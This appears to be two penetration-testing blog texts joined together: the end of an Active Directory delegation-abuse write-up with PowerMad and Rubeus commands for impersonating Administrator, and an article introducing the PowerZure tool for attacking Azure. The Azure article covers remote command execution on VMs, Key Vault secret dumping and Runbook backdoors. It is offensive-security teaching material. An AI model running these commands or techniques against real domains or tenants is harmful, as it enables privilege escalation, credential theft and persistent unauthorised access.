Where constrained delegation sets the SPN in the msDS-AllowedToDelegateTo property, RBCD uses the msDS-AllowedToActOnBehalfOfOtherIdentity property on a computer object. Elad Shamir did an excellent write-up on how this can be abused. The summary of the article is that if the TRUSTED_TO_AUTH_FOR_DELEGATION userAccountControl flag is not present, S4U2Self will still work, but the returned service ticket will not be marked forwardable. In the context of traditional constrained delegation, this means it couldn’t be used in the S4U2Proxy extension. With RBCD, however, even if the ticket is not marked as forwardable, it still works.

The attack primitive, then, is that if an attacker controls an account with an SPN set and a computer account has its msDS-AllowedToActOnBehalfOfOtherIdentity property set to that account, the computer can be compromised. In addition, if the attacker has GenericWrite privileges over a computer account, they can compromise the computer by modifying the ‘AllowedToAct’ attribute and pointing it at an SPN account they control.

If an attacker does not have an account with an SPN set, they can create one by creating a computer object. By default, standard users in AD can create up to 10 computer objects. This can be done with Kevin Robertson’s PowerMad project.
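For example, with PowerMad (machine account name and password are arbitrary):

New-MachineAccount -MachineAccount attackersystem -Password (ConvertTo-SecureString 'P@ssw0rd123' -AsPlainText -Force)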

The attack path then looks like this:

  • Attacker discovers they have GenericWrite privileges over a computer
  • If the attacker doesn’t have an account with an SPN set, PowerMad is used to create a machine account, so now the attacker has an account with an SPN.

OR

  • Attacker discovers the msDS-AllowedToActOnBehalfOfOtherIdentity on a computer is set for an SPN that the user has already compromised

THEN

  • Rubeus’ S4U function is used to request a ticket on behalf of any user, via S4U2Self, to the account with an SPN set (e.g. Getting a TGS for Administrator for newmachine$)
  • Rubeus’ S4U function then uses S4U2Proxy to request a TGS as Administrator (with the TGS from S4U2Self) to the target machine. The ticket is not marked as forwardable, which under traditional constrained delegation, would fail, but under RBCD, it does not matter and succeeds.
  • The attacker is now able to access the target computer
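A sketch of the Rubeus side of this, assuming a PowerMad-created account newmachine$ and LABWIN10 as the target (the hash is a placeholder):

Rubeus.exe s4u /user:newmachine$ /rc4:<newmachine$ NTLM hash> /impersonateuser:Administrator /msdsspn:cifs/LABWIN10.LAB.local /ptt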

As an example, the attacker has compromised Bob, a user account with an SPN set.

For a transcript of the commands used, reference @harmj0y’s gist here (I slightly modified some commands for the User SPN instead of computer account).

Attacking Azure, Azure AD, and Introducing PowerZure

Over the past decade, Azure’s presence in businesses has grown significantly as new features and support were added. The purpose of this article is to cover three main points:

  1. Explain the components of Azure and how they fit into a modern IT environment.
  2. Explain how certain things within Azure can be leveraged from an offensive perspective.
  3. Introduce the PowerZure project and explain how it helps offensive operations against Azure: https://github.com/hausec/PowerZure

Background

Azure was released in 2010 as “Windows Azure” and renamed “Microsoft Azure” in 2014 to signal that Azure covers more than just Windows products, alongside the major additions of Azure Resource Manager (Azure RM) and Azure Active Directory (Azure AD). It started as a Platform as a Service (PaaS) for spinning up Virtual Machines (VMs), Storage, WebApps, and SQL Databases, but has since evolved into Infrastructure as a Service (IaaS) as well as Software as a Service (SaaS), offering over 600 services.

Figure 1: Overview of Azure’s offerings.

Current implementations of Azure often involve several of the components shown above, which are highlighted below.

Components

Azure’s architecture involves several components, a few of which are essential to understand because they are commonly used within businesses.

Enterprise

This represents the Azure global account. It’s the unique identity that the business owns and allows access to subscriptions, tenants, and services.

Tenant

Tenants are instances of Azure for the Enterprise. An Enterprise can have multiple tenants; this is often seen in companies that are geographically separated or have subsidiaries. Access to one tenant in an enterprise does not give access to another tenant. An analogy is that tenants are similar to forests in Active Directory, where trusts can be established (within Azure AD), but that is not the default and must be configured.

Subscriptions

Subscriptions are how you gain access to Azure services (Azure itself, Azure AD, Storage, etc.). Subscriptions are often broken out by business use, e.g. one subscription for production web apps, another for development web apps, etc.

Resources

Resources are the specific applications, such as SQL servers, SQL DBs, virtual networks, runbooks, accounts, etc.

Resource Groups

Resource groups are the containers that house resources. Businesses will often have multiple resource groups, depending on their usage of the resources.

Runbooks

Runbooks are part of the Azure Automation service and support the scripting languages PowerShell and Python (2.7). They allow for automation of operations within Azure, e.g. starting up multiple virtual machines at once. There are possible attack vectors within Runbooks, which are covered later.

Azure Active Directory

Azure Active Directory (Azure AD) is directory services in the cloud. There are many differences between it and on-premise AD, which are also covered later.

Azure AD Connect

Azure AD Connect is the tool that actually connects on-premise AD with Azure AD. It has features such as hash synchronization and federation (between tenants) to link to on-premise AD.

Service Principal

An Azure service principal is a security identity used by user-created apps, services, and automation tools to access specific Azure resources. Think of it as a ‘user identity’ (login and password or certificate) with a specific role and tightly controlled permissions to access your resources. It only needs to be able to do specific things, unlike a general user identity. Security improves if you grant it only the minimum permissions needed to perform its management tasks. For example, an organization can assign its deployment scripts to run authenticated as a service principal.

Architecture

A visualization of Azure’s architecture is shown below.

Figure 2: A visualization of Azure’s architecture.

Azure AD

Azure AD is not a replacement for on-premise AD, nor is it the same thing as Azure (i.e. Azure AD vs. Azure). Azure AD is a management platform for AD from the cloud (reset passwords, create users, add users to groups, etc.) and is used as the authentication piece for Azure as a whole (as well as O365). This still introduces several interesting attack paths that may also affect on-premise AD.

There are three primary ways of integrating on-premise Active Directory with Azure AD: Password Hash Synchronization (PHS), Pass Through Authentication (PTA), and Federated Services (ADFS). PHS and PTA both have potential attack vectors associated with them.

Password Hash Synchronization

With Password Hash Synchronization (PHS), the passwords from on-premise AD are actually sent to the cloud, similar to how domain controllers synchronize passwords between each other via replication. This is done by a service account that is created with the installation of AD Connect.

This introduces a unique attack path: if the synchronization account is compromised, it has enough privileges to potentially lead to the compromise of the on-premise AD forest, as the account is granted the replication rights needed for DCSync. Realistically, the sync account’s password should not be known to anyone and thus never used to log in anywhere; however Dirk-jan, during his Troopers 2019 presentation, discovered how to recover the account’s password from the SQL DB and made a script to do the hard work.

Pass Through Authentication

Pass Through Authentication keeps the passwords on-premise but still allows users to have a single password for Azure and on-premise. For example, when a user logs in to Outlook on the web, they enter their credentials into the web portal (Azure AD); Azure then encrypts the credentials using PKI and sends them to an agent on-premise. The agent decrypts the credentials and validates them against the DC, which returns a status to the agent, which is then relayed back to Azure AD.

It’s possible to perform DLL injection into the PTA agent and intercept authentication requests, which include credentials in clear-text. @_xpn_ has written an excellent blog post on doing this.

Active Directory Federated Services (ADFS)

Azure AD can connect back to on-premise via ADFS. With ADFS, Azure AD is set as a trusted agent for federation and allows login with on-premise credentials.

Access Control

Policies

Policies in Azure do not do the actual controlling of access; they enforce rules and effects for resources. For example, with a policy you can restrict certain sizes of VM in your subscription, or make sure the Administrators group in a VM doesn’t have too many members. Policies are broken into two parts: the policies themselves, and policy definitions. An example is shown below.

Figure 7: Policy Assignment page in Azure.

Figure 8: Choosing a specific policy to assign within Azure.

Policies contain multiple definitions, where the definitions are what do the auditing/action. Thus, you can create a definition and apply it to multiple policies.

Role Based Access Control (RBAC) and Roles

Azure offers more granular control over security with RBAC, in the form of roles. It differs from Policies by focusing on user actions at different scopes. For example, you might be added to the Contributor role for a resource group, allowing you to make changes to that resource group. RBAC in Azure allows for custom roles, however many businesses rely on the built-in roles. The list of roles and their access can be found here. To confuse you more, there’s a difference between Azure roles (referred to as Azure RBAC) and Azure AD roles. The primary difference is that Azure AD roles only affect Azure AD and do not have any influence over resources within Azure. The exception is the Global Administrator role, which has the option (literally a toggle switch in the Azure Portal) to give itself ownership of all resources within Azure itself.

For the purpose of this article, only the following roles within Azure RBAC will be discussed:

  • Owner
  • Contributor
  • Reader

The reason is that there are far too many roles to go in depth on all of them, plus the additional option of custom roles. Within the Azure portal, you can read a resource’s security settings, such as which roles can access or make changes to that resource. This can be viewed in the Identity Access & Management (IAM) tab in the Azure portal if you prefer not to use the CLI.

Figure 9: Checking a user’s role in IAM within Azure.

Resources can have their own specific access control list (ACL), so you can add a user to only be able to view that specific resource. It’s important to note that roles/permissions are inheritance-based: if a user is in the Contributor role for a resource group, they effectively have Contributor access to every resource within that group, even if they are only assigned the Reader role on an individual resource within it.

Attacking Azure and Introducing PowerZure

With several components in Azure, there are several different avenues for attack within the platform. These attack vectors leverage misconfigurations or design flaws, some of which are listed here. The major question that needs to be addressed is: what is the goal of testing an Azure instance? That depends on the engagement and scope of work, so there are multiple answers; in this article the purpose is to demonstrate the implications of certain roles and resources within Azure and how they can be abused, both from a privilege escalation standpoint and from an overall data extraction standpoint, to possibly achieve that goal.

After interacting with Azure via the CLI and the az module, I realized there was a great opportunity to script out many of the tasks an attacker would do within Azure. As a result, I’ve created PowerZure, a PowerShell project whose purpose is to make interacting with Azure a bit easier, as well as adding offensive capability.

PowerZure

PowerZure leverages three PowerShell modules for Azure:

  • Azure CLI
  • Azure PowerShell
  • AzureAD PowerShell

Each module does things the others cannot, hence the need for all three. However, PowerZure mostly relies on the Azure CLI module.

PowerZure has several functions available, broken out by purpose:

  • Operational — Functions that will cause an operation within Azure
  • Information Gathering — Functions that gather information on resources in Azure
  • Data Exfiltration — Functions that will exfiltrate data

For the sake of length and time, not all functions will be covered, but it is necessary to explain the purpose of some and the details around what is happening under the hood.

Startup

PowerZure requires the az module. After importing PowerZure (ipmo .\PowerZure), it will download the required modules if they are not already present.

For full coverage of PowerZure, check out the documentation on readthedocs.io:

https://powerzure.readthedocs.io/en/latest/index.html

It then requires a sign-in before the functions can be used. There are three types of logins for Azure:

  1. Interactive. Simply type az login and you will be directed to a login page. If using MFA, you must login via interactive mode.
  2. Cached token. Tokens for Azure are cached in

C:\Users\[Name]\.Azure\accessTokens.json

so after you login once, the token is cached. This also opens the possibility that an access token can be stolen and re-used.

  3. Pass in credentials. You can login (if MFA is not enabled and you’re using a non-personal account) via az login -u User -p Password

Once logged in, PowerZure will display your username, the subscriptions you have access to, your roles, and your Azure AD group memberships. Knowing the user’s role is key to figuring out what you can do operationally and which functions you can use within PowerZure. PowerZure’s help menu specifically lists which roles are needed to run each function. This is purely in reference to the built-in roles, as custom roles are unpredictable. To view the help menu, the command is PowerZure -h

Figure 10: PowerZure’s help menu

In addition, each function can be used with Get-Help to get information or syntax.

Figure 11: Get-Help displays the syntax for a function

Before further operation of PowerZure, a default subscription must be set if there are multiple subscriptions, so the script knows which to operate against. A subscription can be set via

Set-Subscription -Id [idgoeshere]

The subscription IDs are printed once you login to Azure with PowerZure. If only one subscription is present, this can be ignored.

Role Abuse

Each of the global roles (Administrator, Owner, Contributor, Reader) will be broken down into what can be accomplished, why it matters, and how PowerZure helps.

Reader

The global Reader role has read-only access to components in Azure (subscriptions, policies, resources, etc.). This by itself can give an attacker useful information. For example, if the attacker compromises an account with Reader privileges, they can read Runbooks, which fall under the “Automation Accounts” resource. An example is shown below.

Figure 10: Viewing a Runbook with the ‘Reader’ role. Notice ‘Edit’ and ‘Start’ are grayed out.

This can be useful for spotting hard-coded credentials within those Runbooks.

As a Reader, you can also read several other resources’ details to search for hard-coded credentials or other potentially interesting information, including:

  • Logic apps
  • Deployment Templates
  • Virtual Networks (potentially useful to view new targets/address spaces)
  • Export Templates on Virtual Machines
  • Connection Strings in Azure SQL
  • Configurations on several other resources/applications

PowerZure can be leveraged to do a lot of enumeration as a Reader, for example gathering all users, groups, roles, etc. Runbooks can also be read. In PowerZure, Runbooks can be listed via Get-Runbooks

Figure 12: Listing Runbooks in PowerZure

From here, the Runbooks can be obtained with Get-RunbookContent

Figure 13: Displaying the contents of a Runbook

Readers have access to all of the functions listed under ‘Information Gathering’, which can be found here.

Contributor

The Contributor role allows you to actually edit resources and services within Azure, instead of just reading properties. Several attack vectors present with the Contributor role can be exploited with PowerZure.

  • Execute-Command will execute a supplied command on a targeted VM. As Contributor, these commands are executed as SYSTEM.

Figure 14: Executing ‘whoami’ on a Win10 VM shows commands are run as SYSTEM by default
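For reference, the az CLI capability this builds on looks like the following; the resource group and VM names are placeholders, and this is my illustration rather than PowerZure’s exact internal call:

az vm run-command invoke -g LabResourceGroup -n Win10VM --command-id RunPowerShellScript --scripts "whoami"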

  • Execute-MSBuild is a function that will take in an MSBuild payload and execute it. By default, Windows VMs deployed from Azure’s templates have .NET 4.0 installed.

  • Execute-Program will upload and execute any file that is supplied. It works by identifying a storage container, uploading the supplied file through the Az VM custom script extension, then executing the program via az vm run-command invoke. This entire process unfortunately takes time (~2 mins), due to the dynamic location the file is uploaded to on the VM.
  • Get-AllKeyVaultContents will automatically go through a Key Vault, check for access, and print any secrets, keys, or certificates. By default, Key Vaults only allow access to their owners; however, if a user has global Contributor, they can edit the access policies on the Key Vault and give themselves access. PowerZure does this automatically.

Figure 16: Revealing the secrets in a Key Vault

  • Get-AllAppSecrets will return all passwords or certificate credentials for any application that has them stored.
  • Get-AllSecrets is a catch-all; it will return all Key Vault secrets/keys/credentials, App Secrets, and Automation Account Run-as credentials.

Contributors can also download disks from virtual machines.

  • Get-AvailableVMDisks will list the disks that are available to download, which gives the information needed for
  • Get-VMDisk, which will generate a URL to download that disk. A fair warning, though: disks can be massive in size.

Owner

Owners can do everything a Contributor can, with one additional feature: they can also grant permissions on a resource they own. This is particularly useful as an attacker because it provides many opportunities to create a backdoor into a resource. For example, if an Owner controls a Virtual Machine resource, they can explicitly grant any user Owner status over that Virtual Machine. In PowerZure, this is accomplished via the Set-Role function. In addition, existing roles can be checked via the Get-RolesUser function.

Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest

Figure 17: Adding a user to the Owner role for a VM resource.

Administrator

Administrators over a subscription can do everything an Owner can, plus create additional users and groups within Azure AD. They also have the ability to assign roles for the subscription. PowerZure can utilize an Administrator account to create a backdoor with a Runbook.

  • Create-Backdoor, when executed, will create a Runbook. Inside the Runbook are instructions to create a new user, assign them to the Owner role, then generate a Webhook, which outputs a URI. This URI can then be passed into Execute-Backdoor.
  • Execute-Backdoor will execute the Runbook. An attacker would create a backdoor in case the account currently in use has its password changed. Since the Administrator role is needed to create a user, the Runbook should also create a new co-administrator, in case the credentials of the account in the Administrator role are changed.

Use Case

So what is the point of PowerZure if you can accomplish all of this via the Azure Portal online? While true, PowerZure was written to help automate and script the many tedious tasks that come with enumerating Azure through the Portal, e.g. listing all users of every group. The use case of the tool is situational. One example is if a penetration tester or red teamer compromises a computer and realizes the user has logged into Azure CLI before (not unusual for system admins) and has an accessToken in their .Azure file. The tester could then take that token and impersonate the user in Azure, where they now have Contributor access to several different VMs. In addition, operations within the portal do not always return the full details of the job. With az returning the raw JSON, PowerZure abstracts the JSON to give the relevant details, or in some cases, displays the raw output.

Final Thoughts

Azure usage has increased dramatically in the past few years and Azure AD is becoming more popular. My opinion is that it is not a replacement for on-premise AD at this time, however I do foresee Microsoft adding more functionality to Azure AD to allow businesses to interact more with on-premise. This blog post was meant to establish a base layer of knowledge on the platform and cover some common misconfigurations that can be exploited with PowerZure.

One thing this article only alluded to is detection of said tactics. The detection capabilities within Azure are heavily gate-kept behind Azure’s services, and the defaults leave much to be desired, often requiring work-arounds. That deserves more detail than fits here, so detections within Azure will be covered in a follow-up article.

@haus3c

Sources

  1. PowerZure Project: https://github.com/hausec/PowerZure
  2. NetSPI and Karl Fosaaen
  3. FoxIT and Dirk-Jan
  4. Trimarc and Metcalf
  5. XPN’s blog